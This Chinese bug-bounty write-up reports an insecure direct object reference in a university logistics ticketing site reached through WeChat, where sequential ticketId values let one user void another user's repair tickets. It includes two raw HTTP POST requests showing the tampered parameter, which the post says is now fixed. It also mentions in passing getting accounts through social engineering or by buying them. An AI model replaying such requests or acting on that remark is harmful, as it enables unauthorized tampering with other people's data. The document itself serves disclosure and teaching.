文章总结： 本文记录了一次针对高校后勤微信端平台的渗透测试。作者发现该平台PC端无法正常操作但移动端功能完善，通过手机抓包分析工单作废接口，发现ticketId为连续可预测整数。利用这一逻辑缺陷，攻击者可水平越权修改他人工单ID，实现作废其他用户的工单。最终作者成功验证漏洞并获取证书站挖掘资格，目前该漏洞已修复。 综合评分： 78 文章分类： 渗透测试,WEB安全,漏洞分析,SRC活动,实战经验

某证书站的一次奇特的挖掘

原创

安全小生

安全小生

2026年1月2日 22:24 江西

前言：得到邮件通知又上新了一个证书站 于是就打开电脑简单的来了一次挖掘 相较于寻常的web网站漏洞挖掘 我还是更倾向于微信上的平台挖掘 因为毕竟账号密码这玩意要么找朋友要要么社工出来 要么某鱼上获取 很可惜我没有那个学校的朋友 又不想花钱 哈哈 所以就日该证书站微信的站点

| | | — | | 假如文章对你有帮助，那麻烦师傅们点点关注和赞还有推荐，小生会不定时持续分享实战案例的！！！！                     认准公众号“安全小生” |

进入该学校的后勤平台

这里有一个特殊的地方 这也是我交了为什么没有重复的重要原因

在这里电脑访问该平台是这样的 无论我点击哪里 它都是跳转到主页里

但是当你用手机访问时就不一样了 手机访问可以正常提交工单 这时候我就来了兴趣了 之前都没去配置手机的抓包环境 看到这个于是就配置了一下

随便报修一个

然后再历史工单处 作废工单处选择是

然后滑到最下面抓包（这里是抓手机的包 所以要配一下手机抓包） 抓到这个包

POST /osp2016/ticket/publish/pub.php?s=/pub/view/submit&pubid=ZbYr6b HTTP/1.1 Host: Cookie:  Content-Length: 57 Sec-Ch-Ua-Platform: "Android" User-Agent: Mozilla/5.0 (Linux; Android 14; V2238A Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/142.0.7444.173 Mobile Safari/537.36 XWEB/1420113 MMWEBSDK/20251006 MMWEBID/2224 MicroMessenger/8.0.66.2980(0x2800423E) WeChat/arm64 Weixin NetType/5G Language/zh_CN ABI/arm64 Accept: application/json, text/plain, */* Sec-Ch-Ua: "Chromium";v="142", "Android WebView";v="142", "Not_A Brand";v="99" Content-Type: application/x-www-form-urlencoded Sec-Ch-Ua-Mobile: ?1 Origin:  X-Requested-With: com.tencent.mm Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Priority: u=1, i Connection: keep-alive field_32=5030197&pubid=ZbYr6b&replyMsg=&ticketId=33882558

通过修改ticketId即可做到水平越权作废其他人的工单

经过测试两个相邻的工单 ticketId是相邻的故是可便利id

然后在另一个账户创建一个工单 修改ticketId为33882559即可成功作废

POST /osp2016/ticket/publish/pub.php?s=/pub/view/submit&pubid=ZbYr6b HTTP/1.1 Host:  Cookie:  Content-Length: 57 Sec-Ch-Ua-Platform: "Android" User-Agent: Mozilla/5.0 (Linux; Android 14; V2238A Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/142.0.7444.173 Mobile Safari/537.36 XWEB/1420113 MMWEBSDK/20251006 MMWEBID/2224 MicroMessenger/8.0.66.2980(0x2800423E) WeChat/arm64 Weixin NetType/5G Language/zh_CN ABI/arm64 Accept: application/json, text/plain, */* Sec-Ch-Ua: "Chromium";v="142", "Android WebView";v="142", "Not_A Brand";v="99" Content-Type: application/x-www-form-urlencoded Sec-Ch-Ua-Mobile: ?1 Origin:  X-Requested-With: com.tencent.mm Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer:  Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Priority: u=1, i Connection: keep-alive field_32=5030197&pubid=ZbYr6b&replyMsg=&ticketId=33882559

最终也是成功拿下证书站 打完收工

现经测试，漏洞已经修复了

需要手机抓包环境配置教程的，关注公众号，后台私信“119”自动获取

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全小生 安全小生《某证书站的一次奇特的挖掘》